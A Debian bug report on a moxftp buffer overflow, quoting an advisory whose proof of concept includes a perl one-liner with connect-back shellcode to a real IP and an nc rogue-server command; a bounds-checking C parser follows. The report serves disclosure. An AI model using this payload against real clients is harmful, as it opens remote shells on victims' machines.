
Bug#187481: moxftp arbitrary code execution poc/advisory



Package: moxftp
Version: 2.2-18
Severity: grave
Tags: security

Unfortunately I am currently unable to discover the real problem
behind this potential exploit.  I'm not even sure if it works
on Linux.

FreeBSD people simply marked this package FORBIDDEN, but didn't
fix the problem either.  *sigh*

Regards,

	Joey


Knud Erik Højgaard wrote:
> Attached document explains all.
> 
> This document is also available from http://kokanins.homepage.dk
> 
> --
> Knud
> I. BACKGROUND
> 
> According to the vendor moxftp is a "Ftp shell under X Window System".
> /usr/ports/ftp/moxftp
> 
> II. DESCRIPTION
> 
> Insufficient bounds checking leads to execution of arbitrary code. 
> 
> III. ANALYSIS
> 
> Upon parsing the '220 welcome to server' ftp banner a buffer can be
> overrun, allowing us to execute our arbitrary code. The buffer may be 
> constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing 
> the nops and shellcode in the buffer before ebp seems to cause some 
> problems, luckily there's plenty of space after eip.
> 
> Example run:
> 
> $ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 . "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" .. "\n"' > file
> # nc -l -p 21 < file
> 
> This sets up a rogue server which will overflow the buffer, and execute
> the shellcode. The shellcode is connect-back to 217.157.2.36 port 10000,
> replace "\xd9\x9d\x02\x24" with a suitable ip for testing.
> 
> IV. DETECTION
> 
> moxftp-2.2 shipping with the FreeBSD ports system as well as from 
> various webpages per 9/2-03 is vulnerable.
> 
> V. WORKAROUND
> 
> unknown
> 
> VI. VENDOR FIX
> 
> unknown
> 
> VII. CVE INFORMATION
> 
> unknown
> 
> VIII. DISCLOSURE TIMELINE
> 
> unknown
> 
> IX. CREDIT
> 
> Knud Erik Højgaard
> 


-- 
Life is too short to run proprietary software.  -- Bdale Garbee

Please always Cc to me when replying to me on the lists.
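For the bounds-checking point in section III of the quoted advisory, an added example of the defensive side (not moxftp's code, which this report does not show): a hypothetical reply-line parser in C that refuses any server reply too long for its fixed buffer instead of copying it unchecked. The 512-byte buffer size and all function names are assumptions.

```c
#include <stdlib.h>
#include <string.h>

/* Fixed reply buffer size: an assumed value, chosen to match the 508-byte
 * padding plus saved ebp in the advisory's overflow layout. */
#define FTP_REPLY_MAX 512

struct ftp_reply {
    int code;                   /* three-digit reply code, e.g. 220 */
    char text[FTP_REPLY_MAX];   /* reply text, always NUL-terminated */
};
/* Parse one reply line from an untrusted server into 'out'. Returns 0 on
 * success, -1 if the line is malformed or would not fit: an over-long line
 * is rejected outright rather than copied into the fixed buffer unchecked. */
int parse_ftp_reply(const char *line, size_t len, struct ftp_reply *out)
{
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;                  /* strip trailing CRLF */
    /* RFC 959: three ASCII digits, then a space (or '-' for multi-line). */
    if (len < 4) return -1;
    for (int i = 0; i < 3; i++)
        if (line[i] < '0' || line[i] > '9') return -1;
    if (line[3] != ' ' && line[3] != '-') return -1;
    size_t text_len = len - 4;
    if (text_len >= FTP_REPLY_MAX) return -1;   /* room for the terminator */
    out->code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
    memcpy(out->text, line + 4, text_len);
    out->text[text_len] = '\0';
    return 0;
}

/* Wrapper for NUL-terminated lines: the reply code, or -1 if rejected. */
int ftp_reply_code(const char *line)
{
    struct ftp_reply r;
    return parse_ftp_reply(line, strlen(line), &r) == 0 ? r.code : -1;
}
/* Constructs a "220 " banner followed by n filler bytes and a newline, and
 * reports whether the parser accepts it (1) or rejects it (0). */
int banner_accepted(size_t n)
{
    char *line = malloc(n + 6);
    if (!line) return 0;
    memcpy(line, "220 ", 4);
    memset(line + 4, 'A', n);
    line[n + 4] = '\n';
    line[n + 5] = '\0';
    int ok = ftp_reply_code(line) == 220;
    free(line);
    return ok;
}
```

A banner whose text fills the buffer (512 bytes or more) is refused before any copy, so the layout described in the advisory never reaches the stack.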


